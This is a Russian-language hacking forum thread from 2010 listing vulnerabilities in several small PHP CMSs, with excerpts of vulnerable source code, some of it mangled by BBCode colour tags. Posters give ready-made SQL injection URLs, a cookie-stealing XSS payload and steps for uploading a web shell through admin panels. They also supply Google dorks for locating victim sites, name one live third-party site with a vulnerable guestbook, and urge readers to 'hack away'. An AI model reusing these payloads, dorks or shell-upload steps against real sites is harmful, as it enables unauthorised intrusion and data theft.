26.10.2010, 06:35
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
|
|
|
26.10.2010, 22:16
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
phpComasy v1.0.1
Скачать
Активная XSS
Пример одного сайта:
Код:
http://www.natamohn.com/?id=12&mod_action=add_guestbook_entry_form
Уязвимые поля>>
Код:
Firstname* , Lastname, e-Mail , WWW , Comment*
doc: powered by phpComasy
|
|
|
|
01.11.2010, 21:56
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Apprain CMS
Version:0.1.X
Off Site: http://www.apprain.com/
(1.11.2010)
Заливка шелла через админку
1. Способ| Gallery -> Add New Picture
написанно "*.jpg, *.gif, *.png" но шелл заливается удачно, адресс шелла /uploads/filemanager/ *** .php
2. Способ| Store-> Add New product
PHP код:
[COLOR="#000000"]var uploadAllFiles, uploadOnlyImageFiles;
window.onload = function() {
uploadAllFiles = new SWFUpload({
// Backend Settings
upload_url: "[COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]baseurl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/common/general_upload/'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]?>[/COLOR]",
post_params: {"PHPSESSID" : "[COLOR="#0000BB"][/COLOR]"},
// File Upload Settings
file_size_limit : "102400", // 100MB
file_types : "*.*",
file_types_description : "All Files",
file_upload_limit : "100",
file_queue_limit : "0",
.......[/COLOR]
Активная XSS
/member/signup
При регистрацыии Пользователя -> First Name - Last Name - Address
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_tag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"form"[/COLOR][COLOR="#007700"],array([/COLOR][COLOR="#DD0000"]"method"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"post"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"class"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"app_form app_validation"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"signup_form"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"action"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]baseurl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/member/signup"[/COLOR][COLOR="#007700"])));
echo[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_tag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"ul"[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]get_from_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"First Name"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]inputTag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"data[Member][f_name]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],array([/COLOR][COLOR="#DD0000"]"class"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"input check_notempty"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'f_name'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'longdesc'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Please enter your first name'[/COLOR][COLOR="#007700"])) );
echo[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]get_from_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Last Name"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]inputTag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"data[Member][l_name]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],array([/COLOR][COLOR="#DD0000"]"class"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"input check_notempty"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'l_name'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'longdesc'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Please enter your last name'[/COLOR][COLOR="#007700"])) );
echo[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]get_from_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Country"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]countryTag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"data[Member][country]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],array([/COLOR][COLOR="#DD0000"]"title"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"Country"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"id"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"country"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"class"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"select check_notempty"[/COLOR][COLOR="#007700"]),array([/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Your Country'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'longdesc'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Please select your country'[/COLOR][COLOR="#007700"])) );
echo[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]get_from_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Address"[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]App[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Helper/Html"[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]textareaTag[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"data[Member][address]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],array([/COLOR][COLOR="#DD0000"]"rows"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"3"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"class"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"input check_notempty"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'address'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'longdesc'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Enter your address infomration'[/COLOR][COLOR="#007700"])) );[/COLOR][/COLOR]
/admin/account/edit
Сообщение от None
В админ панели -> First Name - Last Name
/information/manage/blog-post
Редактируем "Title" на ">window.location.href='http://www.google.de/';
/admin/config/general
Admin Setting -> Site Title
и во многих других местах админки
Пассивная XSS
www.localhost/quickstart/admin/forgotlogin
\development\view\system\admin\forgotlogin.phtml
Fotgoet Password-> Enter you Email Address ->
Сообщение от None
value="">alert(document.cookie)"
PHP код:
[COLOR="#000000"][/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Admin'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Admin'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#0000BB"]?>[/COLOR]" />[/COLOR]
+
Search
\development\view\whitecloud\home\search.phtml
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Search Reasult for"[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]?>[/COLOR] '[COLOR="#0000BB"][/COLOR]'
[COLOR="#0000BB"]
[/COLOR] [COLOR="#0000BB"][/COLOR][COLOR="#0000BB"]__[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Total result found "[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[COLOR="#0000BB"][/COLOR] [COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"][/COLOR]
[COLOR="#0000BB"]
[/COLOR] [COLOR="#0000BB"][/COLOR][COLOR="#0000BB"][/COLOR][/COLOR]
|
|
|
|
02.11.2010, 20:23
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Уязвимости Open Constructor
Тип уязвимости: SQL inj
Зависимости: Права админа
Куски уязвимых кодов:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT id, ds_type, obj_type FROM objects WHERE id='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);[/[/COLOR][COLOR="#0000BB"]B[/COLOR][COLOR="#007700"]]
[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Location: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ds_type'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'obj_type'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'.php?id='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$obj[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
die();
}
[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]load[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ds_id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ds_id[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'new'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$pr[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getAllPages[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]WCDB[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]bo[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"](
[/COLOR][COLOR="#DD0000"]'SELECT id '[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'FROM dshtmltext '[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'WHERE ds_id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]ds_id
[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]))
unset([/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]]);
[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$pr[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPage[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_doc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_record[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]assert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_doc[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
}
require_once([/COLOR][COLOR="#0000BB"]LIBDIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/syntax/syntaxhighlighter._wc'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"]= array();
[/COLOR][COLOR="#0000BB"]preg_match_all[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'~[/COLOR][COLOR="#0000BB"]allowedTags[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]PREG_PATTERN_ORDER[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$allowed[/COLOR][COLOR="#007700"]= (array) @[/COLOR][COLOR="#0000BB"]$m[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$sDoc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]wrapDocument[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_doc[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$save[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'new'[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]WCS[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]decide[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'createdoc'[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$pages[/COLOR][COLOR="#007700"]) >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]WCS[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]decide[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_ds[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'editdoc'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]WCS[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]decide[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sDoc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'editdoc'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
Примеры:
localhost/../objects/edit.php?j=1&id=4%20union%20select%201,2,3--
localhost/../../htmltext/edit.php?ds_id=90&id=36%20union%20select%201,2,3,4 ,5,6,7,8--
|
|
|
|
02.11.2010, 20:29
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Уязвимости Simple CMS
О Simple CMS
От себя хочу сказать, что Simple CMS. ver.1.0. вся дырявая. Почти на каждом месте есть SQL inj.
По дорку гугла мне выдало "Результатов: примерно 14 800 (0,35 сек.)".
SQL инъекции:
SQL inj в выборе статьи, уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'artcl'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$id_art[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'artcl'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT title, article FROM artcl WHERE IDart="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id_art[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Как видно, нет никакой фильтрации..
Пример: localhost/index.php?id=3&artcl=-4 union select version(),2--
SQL inj в выборе раздела, уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
}
else
{
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
}
print[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$razdel[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT menu, txt FROM tree WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Пример: localhost/index.php?id=-3 union select 1,version()--
Незачем дальше перечислять, она вся в дырках.
К сожалению, хочу отметить, что пароли администраторов не хранятся в БД. Они находятся в файле connect.php.
Панель администратора находится по адресу /admin/, если вы попали в админку, то заходим: Баннеры > льём через форму загрузки баннеров шелл > шелл будет доступен по адресу images/shell.php
Вот вам пример, хекайте!
P.S Дорк "intext:Разработано Яшиной С. svetulik2004@mail.ru".
Модуль Новостей
Только что зашёл на официальный сайт в раздел Мои разработки, скачал модуль новостей и снова он бажный .
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id_news'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$id_news[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id_news'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$news[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT rus_name, rus_annonce, rus_content, date FROM news WHERE id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id_news[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Пример: localhost/news/news.php?id_news=-2 union select version(),2,3,4--
З.Ы Писала движок девушка . Официальный сайт
|
|
|
|
02.11.2010, 20:30
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Уязвимости Booot CMS
Тип уязвимости: SQL inj
Зависимости: Права админа
Куски уязвимых кодов:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `prefix_products_topics` WHERE `id` = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]]);
[/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(!isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]])) {
....
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `prefix_content` WHERE `id` = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(!isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]])) {
....
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `prefix_content` WHERE `id` = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'top'[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]
Примеры:
host/admin/?module=Catalog&method=Info&top=-12 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8--
host/admin/?module=Content&method=Info&top=-5 union select 1,2,3,4,version(),6,7,8,9,0,1,2,3--
Уязвима вся админка. Видимо разработчики решили, что баги в админке никому не нужны..
|
|
|
|
11.11.2010, 01:08
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Дополнение к посту от SeNaP
WAP ENGINE 4.2 (Возможно и другие версии)
активная xss в гостевой книге
\modules\guest\send.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
...
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
